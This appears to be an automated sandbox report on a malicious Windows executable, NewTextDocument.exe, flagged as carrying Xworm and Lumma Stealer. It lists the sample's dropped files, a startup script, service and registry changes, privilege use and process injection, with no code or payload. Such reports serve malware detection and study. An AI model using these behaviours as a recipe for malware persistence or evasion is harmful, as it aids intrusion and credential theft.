Analysis Overview
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
Threat Level: Known bad
The file NewTextDocument.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Lumma Stealer, LummaC
Lumma family
Xworm
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm family
Creates new service(s)
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Drops startup file
Power Settings
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-06-05 19:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-06-05 19:12
Reported
2025-06-05 19:15
Platform
win10v2004-20250502-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2344 created 608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 6084 created 608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342576763-1998465526-3870295501-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChannelName.vbs | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\t3u2Imz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\94mG4Ak.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\a\1UGwDFF.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\ywnaglhcizog\jxlvfvkylpsp.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\dialer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 05 Jun 2025 19:14:42 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\hJ5bmFj.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
